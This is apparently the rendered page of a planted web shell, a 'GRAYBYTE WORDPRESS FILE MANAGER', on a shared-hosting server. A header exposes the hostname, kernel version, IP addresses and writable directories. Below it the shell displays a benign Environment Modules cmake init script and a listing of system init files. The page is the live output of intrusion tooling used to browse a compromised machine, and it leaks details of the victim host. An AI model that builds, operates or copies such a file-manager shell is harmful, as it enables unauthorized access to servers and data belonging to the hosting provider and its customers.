✘✘ GRAYBYTE WORDPRESS FILE MANAGER ✘✘

​🇳​​🇦​​🇲​​🇪♯➤ server366.web-hosting.com ​🇻​♯➤ 4.18.0-553.50.1.lve.el8.x86_64 #1 SMP 🇾​♯➤ 2025

𝗛𝗢𝗠𝗘 𝗜𝗗 ♯➤ 67.223.118.204 ♯➤ 𝗔𝗗𝗠𝗜𝗡 𝗜𝗗 216.73.216.36
𝗢𝗣𝗧𝗜𝗢𝗡𝗦 ♯ CRL ♯➤ 𝗢𝗞 ┃ WGT ♯➤ 𝗢𝗞 ┃ SDO ♯➤ 𝗢𝗙𝗙 ┃ PKEX ♯➤ 𝗢𝗙𝗙
𝗗𝗘𝗔𝗖𝗧𝗜𝗩𝗔𝗧𝗘𝗗 ♯➤ 𝗔𝗟𝗟 𝗪𝗢𝗥𝗞𝗜𝗡𝗚....

𝗛𝗢𝗠𝗘
𝗖𝗨𝗥𝗥𝗘𝗡𝗧 𝗙𝗜𝗟𝗘 : /usr/share/Modules/init//cmake
# define modules runtine quarantine configuration
set(ENV{MODULES_RUN_QUARANTINE} "LD_LIBRARY_PATH LD_PRELOAD")

# setup quarantine if defined
set(_mlre "")
if(DEFINED ENV{MODULES_RUN_QUARANTINE})
   string(REPLACE " " ";" _mlv_list "$ENV{MODULES_RUN_QUARANTINE}")
   foreach(_mlv ${_mlv_list})
      if(${_mlv} MATCHES "^[A-Za-z_][A-Za-z0-9_]*$")
         if(DEFINED ENV{${_mlv}})
            set(_mlre "${_mlre}${_mlv}_modquar=$ENV{${_mlv}};")
         endif()
         set(_mlrv "MODULES_RUNENV_${_mlv}")
         set(_mlre "${_mlre}${_mlv}=$ENV{${_mlrv}};")
     endif()
   endforeach()
   if (NOT "${_mlre}" STREQUAL "")
      set(_mlre "env;${_mlre}")
   endif()
endif()

# define module command and surrounding initial environment (default value
# for MODULESHOME, MODULEPATH, LOADEDMODULES and parse of init config files)
execute_process(COMMAND mktemp -t moduleinit.cmake.XXXXXXXXXXXX
  OUTPUT_VARIABLE tempfile_name
  OUTPUT_STRIP_TRAILING_WHITESPACE)
execute_process(COMMAND ${_mlre} /usr/bin/tclsh /usr/share/Modules/libexec/modulecmd.tcl cmake autoinit
  OUTPUT_FILE ${tempfile_name})
if(EXISTS ${tempfile_name})
  include(${tempfile_name})
  file(REMOVE ${tempfile_name})
endif()

# redefine module command if compat version has been activated
if("$ENV{MODULES_USE_COMPAT_VERSION}" STREQUAL "1")
   set(ENV{MODULES_CMD} "/usr/share/Modules/libexec/modulecmd-compat")
   function(module)
      execute_process(COMMAND mktemp -t moduleinit.cmake.XXXXXXXXXXXX
         OUTPUT_VARIABLE tempfile_name
         OUTPUT_STRIP_TRAILING_WHITESPACE)
      execute_process(COMMAND /usr/share/Modules/libexec/modulecmd-compat cmake ${ARGV}
         OUTPUT_FILE ${tempfile_name})
      if(EXISTS ${tempfile_name})
         include(${tempfile_name})
         file(REMOVE ${tempfile_name})
      endif()
      # return value as done on new main version
      set(module_result TRUE PARENT_SCOPE)
   endfunction(module)
endif()


Current_dir [ 𝗡𝗢𝗧 𝗪𝗥𝗜𝗧𝗘𝗔𝗕𝗟𝗘 ] Document_root [ 𝗪𝗥𝗜𝗧𝗘𝗔𝗕𝗟𝗘 ]


[ Back ]
𝗡𝗔𝗠𝗘
𝗦𝗜𝗭𝗘
𝗟𝗔𝗦𝗧 𝗧𝗢𝗨𝗖𝗛
𝗨𝗦𝗘𝗥
𝗦𝗧𝗔𝗧𝗨𝗦
𝗙𝗨𝗡𝗖𝗧𝗜𝗢𝗡𝗦
..
--
30 Apr 2025 10.03 AM
root / root
0755
ksh-functions
--
30 Apr 2025 10.03 AM
root / root
0755
zsh-functions
--
30 Apr 2025 10.03 AM
root / root
0755
bash
4.037 KB
14 Oct 2023 6.46 PM
root / root
0644
bash_completion
11.195 KB
14 Oct 2023 6.46 PM
root / root
0644
cmake
1.88 KB
14 Oct 2023 6.46 PM
root / root
0644
csh
3.783 KB
14 Oct 2023 6.46 PM
root / root
0644
fish
1.692 KB
14 Oct 2023 6.46 PM
root / root
0644
fish_completion
9.421 KB
14 Oct 2023 6.46 PM
root / root
0644
ksh
4.064 KB
14 Oct 2023 6.46 PM
root / root
0644
lisp
3.154 KB
14 Oct 2023 6.46 PM
root / root
0644
perl.pm
1.092 KB
14 Oct 2023 6.46 PM
root / root
0644
profile-compat.csh
0.192 KB
14 Oct 2023 6.46 PM
root / root
0644
profile-compat.sh
0.302 KB
14 Oct 2023 6.46 PM
root / root
0644
profile.csh
0.103 KB
14 Oct 2023 6.46 PM
root / root
0644
profile.sh
0.438 KB
14 Oct 2023 6.46 PM
root / root
0644
python.py
1.503 KB
14 Oct 2023 6.46 PM
root / root
0644
r.R
0.938 KB
14 Oct 2023 6.46 PM
root / root
0644
ruby.rb
1.347 KB
14 Oct 2023 6.46 PM
root / root
0644
sh
3.91 KB
14 Oct 2023 6.46 PM
root / root
0644
tcl
1.046 KB
14 Oct 2023 6.46 PM
root / root
0644
tcsh
3.789 KB
14 Oct 2023 6.46 PM
root / root
0644
tcsh_completion
5.392 KB
14 Oct 2023 6.46 PM
root / root
0644
zsh
4.054 KB
14 Oct 2023 6.46 PM
root / root
0644

✘✘ GRAYBYTE WORDPRESS FILE MANAGER @ 2026 CONTACT ME ✘✘
Static GIF Static GIF